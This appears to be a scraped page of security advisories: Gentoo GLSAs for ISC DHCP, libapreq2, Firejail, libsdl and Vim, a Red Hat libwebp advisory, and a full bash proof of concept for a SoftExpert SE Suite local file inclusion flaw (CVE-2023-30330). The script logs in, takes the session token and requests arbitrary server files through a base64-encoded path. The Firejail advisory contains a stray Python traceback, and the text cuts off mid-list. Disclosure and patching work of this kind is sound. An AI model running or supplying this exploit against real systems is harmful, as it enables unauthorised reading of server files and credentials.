The Databricks Platform as of 2023-01-26 suffered from a cluster isolation bypass vulnerability through insecure defaults and shared storage.

Databricks Platform Cluster Isolation Bypass

Gentoo Linux Security Advisory 202305-22 - Multiple vulnerabilities have been discovered in ISC DHCP, the worst of which could result in denial of service. Versions less than 4.4.3_p1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-22  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: ISC DHCP: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #875521, #792324  
       ID: 202305-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in ISC DHCP, the worst of  
which could result in denial of service.

Background  
==========

ISC DHCP is ISC's reference implementation of all aspects of the Dynamic  
Host Configuration Protocol.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-misc/dhcp              < 4.4.3_p1                >= 4.4.3_p1

Description  
===========

Multiple vulnerabilities have been discovered in ISC DHCP. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All ISC DHCP users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/dhcp-4.4.3_p1"

References  
==========

[ 1 ] CVE-2021-25217  
      https://nvd.nist.gov/vuln/detail/CVE-2021-25217  
[ 2 ] CVE-2022-2928  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2928  
[ 3 ] CVE-2022-2929  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2929

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-22

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-22

Red Hat Security Advisory 2023-2085-01 - The libwebp packages provide a library and tools for the WebP graphics format. WebP is an image format with a lossy compression of digital photographic images. WebP consists of a codec based on the VP8 format, and a container based on the Resource Interchange File Format. Webmasters, web developers and browser developers can use WebP to compress, archive, and distribute digital images more efficiently. Issues addressed include a double free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libwebp security update  
Advisory ID:       RHSA-2023:2085-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:2085  
Issue date:        2023-05-02  
CVE Names:         CVE-2023-1999   
=====================================================================

1. Summary:

An update for libwebp is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libwebp packages provide a library and tools for the WebP graphics  
format. WebP is an image format with a lossy compression of digital  
photographic images. WebP consists of a codec based on the VP8 format, and  
a container based on the Resource Interchange File Format (RIFF).  
Webmasters, web developers and browser developers can use WebP to compress,  
archive, and distribute digital images more efficiently.

Security Fix(es):

* Mozilla: libwebp: Double-free in libwebp (CVE-2023-1999)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2186102 - CVE-2023-1999 Mozilla: libwebp: Double-free in libwebp

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
libwebp-1.0.0-7.el8_6.src.rpm

aarch64:  
libwebp-1.0.0-7.el8_6.aarch64.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.aarch64.rpm  
libwebp-debugsource-1.0.0-7.el8_6.aarch64.rpm  
libwebp-devel-1.0.0-7.el8_6.aarch64.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.aarch64.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.aarch64.rpm

ppc64le:  
libwebp-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-debugsource-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-devel-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.ppc64le.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.ppc64le.rpm

s390x:  
libwebp-1.0.0-7.el8_6.s390x.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.s390x.rpm  
libwebp-debugsource-1.0.0-7.el8_6.s390x.rpm  
libwebp-devel-1.0.0-7.el8_6.s390x.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.s390x.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.s390x.rpm

x86_64:  
libwebp-1.0.0-7.el8_6.i686.rpm  
libwebp-1.0.0-7.el8_6.x86_64.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.i686.rpm  
libwebp-debuginfo-1.0.0-7.el8_6.x86_64.rpm  
libwebp-debugsource-1.0.0-7.el8_6.i686.rpm  
libwebp-debugsource-1.0.0-7.el8_6.x86_64.rpm  
libwebp-devel-1.0.0-7.el8_6.i686.rpm  
libwebp-devel-1.0.0-7.el8_6.x86_64.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.i686.rpm  
libwebp-java-debuginfo-1.0.0-7.el8_6.x86_64.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.i686.rpm  
libwebp-tools-debuginfo-1.0.0-7.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1999  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZFFOytzjgjWX9erEAQjyYA/+KUlMr2KE0I5leb2eOOEg4K4d8Fhk8mnr  
Pj8mhOIbKOjKfLOC6O92zhbx7hDJ+Fra+eXcr7N85EqKmEnbupCsoZbaTm4acSu2  
fvae6RqwhpbXhrnKqLPOw8hvHU46LZNwnz1JbohfeUy5p7LIc4khiPum43NkLOjO  
VtGEt0uTf2zwfYNLuRltImNeURcVx8TTHgdxQ5fQzaIjAZ+mAlwTspSVOLt/bvn4  
A+OTv01DkBl2ZJtJ/Cxm0FxnvxR8yCSkRXKpNQreWWulRNFvDQWTqVclKeQOrBHG  
UI22nJRWcv97dTNEn9K/c4kD4jZSM2cwr35gLemzTufQbk4YqC3eYTc1AXl/8erj  
X861SK5GhIzHBCvPSPSZo/bjeAh33r5DRCURxOI8Ai/AQbVF706mO65ZNLd4oDux  
I2w5gSq3u8ryp8lQ+EuACX8CunKOpJ0C+sXZFofwKfjr3pRb0JAaPor2dUp/zSod  
m31NChEfVIhuKbfzBjtrx77TebzV25KqxkpDXqDbv/3RrWzkUOMlT9CXR3VRZ1/C  
pnO5TVCihZ6nJHh/m8hudZzNTAObvl1dem1MJ1Q0S2RuOw5cWXYIeNjHYz0obBMt  
tnq6C5p9Mjx3BFgdpgazb8FzpxGPyywuKq4Wfg2CIS8VW4N/UhkfiTJa72WT1sQk  
CGORhg1nqdE=  
=Yvw1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-2085-01

Gentoo Linux Security Advisory 202305-20 - A buffer overflow vulnerability has been discovered in libapreq2 which could result in denial of service. Versions less than 2.17 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: libapreq2: Buffer Overflow  
     Date: May 03, 2023  
     Bugs: #866536  
       ID: 202305-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A buffer overflow vulnerability has been discovered in libapreq2 which  
could result in denial of service.

Background  
==========

libapreq is a shared library with associated modules for manipulating  
client request data via the Apache API.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-apache/libapreq2       < 2.17                        >= 2.17

Description  
===========

TODO

Impact  
======

An attacker could submit a crafted multipart form to trigger the buffer  
overflow and cause a denial of service.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libapreq2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-apache/libapreq2-2.17"

References  
==========

[ 1 ] CVE-2022-22728  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22728

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-20

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-20

SoftExpert Suite version 2.1.3 suffers from a local file inclusion vulnerability.

    # Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion# Date: 27-04-2023# Exploit Author: Felipe Alcantara (Filiplain)# Vendor Homepage: https://www.softexpert.com/# Version: 2.0 < 2.1.3# Tested on: Kali Linux# CVE : CVE-2023-30330# SE Suite versions tested: 2.0.15.31, 2.0.15.115# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330#!/bin/bash# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path> target=$1u=$2p=$3file=$(echo -n "$4"|base64 -w 0)end="\033[0m\e[0m"red="\e[0;31m\033[1m"blue="\e[0;34m\033[1m"echo -e "\n$4 : $file\n"echo -e "${blue}\nGETTING SESSION COOKIE${end}"cookie=$(curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \    -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \    --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \    "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)echo "cookie: $cookie"function LFI () {curl -s -k -X $'POST' \    -H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \    -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \    --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \    "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"}echo -e "${blue}\nExploiting LFI:${end}"LFIfunction logout () {curl -i -s -k -X $'POST' \    -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \    -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \    "https://$target/softexpert/selogout"}echo -e "${blue}\nLogging out${end}"logout >/dev/nullecho -e "\n\nDone!"

SoftExpert Suite 2.1.3 Local File Inclusion

Gentoo Linux Security Advisory 202305-19 - A vulnerability has been discovered in Firejail which could result in local root privilege escalation.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Firejail: Local Privilege Escalation  
     Date: May 03, 2023  
     Bugs: #850748  
       ID: 202305-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Firejail which could result in  
local root privilege escalation.

Background  
==========

A SUID program that reduces the risk of security breaches by restricting  
the running environment of untrusted applications using Linux namespaces  
and seccomp-bpf.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
Traceback (most recent call last):  
  File "/usr/local/lib/python3.9/site-packages/glsamaker/models/glsa.py", line 326, in generate_mail_table  
    return self._generate_mail_table()  
  File "/usr/local/lib/python3.9/site-packages/glsamaker/models/glsa.py", line 297, in _generate_mail_table  
    vuln.range_types_rev[vuln.pkg_range], vuln.version  
KeyError: None

Description  
===========

Firejail does not sufficiently validate the user's environment prior to  
using it as the root user when using the --join command line option.

Impact  
======

An unprivileged user can exploit this vulnerability to achieve local  
root privileges.

Workaround  
==========

System administrators can mitigate this vulnerability via adding either  
"force-nonewprivs yes" or "join no" to the Firejail configuration file  
in /etc/firejail/firejail.config.

Resolution  
==========

Gentoo has discontinued support for sys-apps/firejail-lts. Users should  
unmerge it in favor of sys-apps/firejail:

  # emerge --ask --depclean --verbose "sys-apps/firejail-lts"  
  # emerge --ask --verbose "sys-apps/firejail"

All Firejail users should upgrade to the latest version:

  # emerge --ask --oneshot --verbose ">=sys-apps/firejail-0.9.70"

References  
==========

[ 1 ] CVE-2022-31214  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31214

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-19

Gentoo Linux Security Advisory 202305-18 - Multiple vulnerabilities have been found in libsdl2, the worst of which could result in arbitrary code execution. Versions less than 2.26.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libsdl2: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #836665, #890614  
       ID: 202305-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in libsdl2, the worst of which  
could result in arbitrary code execution.

Background  
==========

Simple DirectMedia Layer is a cross-platform development library  
designed to provide low level access to audio, keyboard, mouse,  
joystick, and graphics hardware via OpenGL and Direct3D.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/libsdl2         < 2.26.0                    >= 2.26.0

Description  
===========

Multiple vulnerabilities have been discovered in libsdl2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libsdl2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libsdl2-2.26.0"

References  
==========

[ 1 ] CVE-2021-33657  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33657  
[ 2 ] CVE-2022-4743  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4743

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-18

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-18

Gentoo Linux Security Advisory 202305-17 - Multiple vulnerabilities have been found in libsdl, the worst of which could result in arbitrary code execution. Versions less than 1.2.15_p20221201>= are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libsdl: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #692388, #836665, #861809  
       ID: 202305-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in libsdl, the worst of which  
could result in arbitrary code execution.

Background  
==========

Simple DirectMedia Layer is a cross-platform development library  
designed to provide low level access to audio, keyboard, mouse,  
joystick, and graphics hardware via OpenGL and Direct3D.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  media-libs/libsdl          < 1.2.15_p20221201>= 1.2.15_p20221201

Description  
===========

Multiple vulnerabilities have been discovered in SDL. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libsdl users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libsdl-1.2.15_p20221201"

References  
==========

[ 1 ] CVE-2019-7572  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7572  
[ 2 ] CVE-2019-7573  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7573  
[ 3 ] CVE-2019-7574  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7574  
[ 4 ] CVE-2019-7575  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7575  
[ 5 ] CVE-2019-7576  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7576  
[ 6 ] CVE-2019-7577  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7577  
[ 7 ] CVE-2019-7578  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7578  
[ 8 ] CVE-2019-7635  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7635  
[ 9 ] CVE-2019-7636  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7636  
[ 10 ] CVE-2019-7638  
      https://nvd.nist.gov/vuln/detail/CVE-2019-7638  
[ 11 ] CVE-2019-13616  
      https://nvd.nist.gov/vuln/detail/CVE-2019-13616  
[ 12 ] CVE-2021-33657  
      https://nvd.nist.gov/vuln/detail/CVE-2021-33657  
[ 13 ] CVE-2022-34568  
      https://nvd.nist.gov/vuln/detail/CVE-2022-34568

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-17

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-17

Gentoo Linux Security Advisory 202305-16 - Multiple vulnerabilities have been found in Vim, the worst of which could result in denial of service. Versions less than 9.0.1157 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202305-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Vim, gVim: Multiple Vulnerabilities  
     Date: May 03, 2023  
     Bugs: #851231, #861092, #869359, #879257, #883681, #889730  
       ID: 202305-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Vim, the worst of which  
could result in denial of service.

Background  
==========

Vim is an efficient, highly configurable improved version of the classic  
‘vi’ text editor. gVim is the GUI version of Vim.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-editors/gvim           < 9.0.1157                >= 9.0.1157  
  2  app-editors/vim            < 9.0.1157                >= 9.0.1157  
  3  app-editors/vim-core       < 9.0.1157                >= 9.0.1157

Description  
===========

Multiple vulnerabilities have been discovered in Vim, gVim. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Vim users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-editors/vim-9.0.1157"

All gVim users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-editors/gvim-9.0.1157"

All vim-core users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-editors/vim-core-9.0.1157"

References  
==========

[ 1 ] CVE-2022-1154  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1154  
[ 2 ] CVE-2022-1160  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1160  
[ 3 ] CVE-2022-1381  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1381  
[ 4 ] CVE-2022-1420  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1420  
[ 5 ] CVE-2022-1616  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1616  
[ 6 ] CVE-2022-1619  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1619  
[ 7 ] CVE-2022-1620  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1620  
[ 8 ] CVE-2022-1621  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1621  
[ 9 ] CVE-2022-1629  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1629  
[ 10 ] CVE-2022-1674  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1674  
[ 11 ] CVE-2022-1720  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1720  
[ 12 ] CVE-2022-1725  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1725  
[ 13 ] CVE-2022-1733  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1733  
[ 14 ] CVE-2022-1735  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1735  
[ 15 ] CVE-2022-1769  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1769  
[ 16 ] CVE-2022-1771  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1771  
[ 17 ] CVE-2022-1785  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1785  
[ 18 ] CVE-2022-1796  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1796  
[ 19 ] CVE-2022-1851  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1851  
[ 20 ] CVE-2022-1886  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1886  
[ 21 ] CVE-2022-1897  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1897  
[ 22 ] CVE-2022-1898  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1898  
[ 23 ] CVE-2022-1927  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1927  
[ 24 ] CVE-2022-1942  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1942  
[ 25 ] CVE-2022-1968  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1968  
[ 26 ] CVE-2022-2000  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2000  
[ 27 ] CVE-2022-2042  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2042  
[ 28 ] CVE-2022-2124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2124  
[ 29 ] CVE-2022-2125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2125  
[ 30 ] CVE-2022-2126  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2126  
[ 31 ] CVE-2022-2129  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2129  
[ 32 ] CVE-2022-2175  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2175  
[ 33 ] CVE-2022-2182  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2182  
[ 34 ] CVE-2022-2183  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2183  
[ 35 ] CVE-2022-2206  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2206  
[ 36 ] CVE-2022-2207  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2207  
[ 37 ] CVE-2022-2208  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2208  
[ 38 ] CVE-2022-2210  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2210  
[ 39 ] CVE-2022-2231  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2231  
[ 40 ] CVE-2022-2257  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2257  
[ 41 ] CVE-2022-2264  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2264  
[ 42 ] CVE-2022-2284  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2284  
[ 43 ] CVE-2022-2285  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2285  
[ 44 ] CVE-2022-2286  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2286  
[ 45 ] CVE-2022-2287  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2287  
[ 46 ] CVE-2022-2288  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2288  
[ 47 ] CVE-2022-2289  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2289  
[ 48 ] CVE-2022-2304  
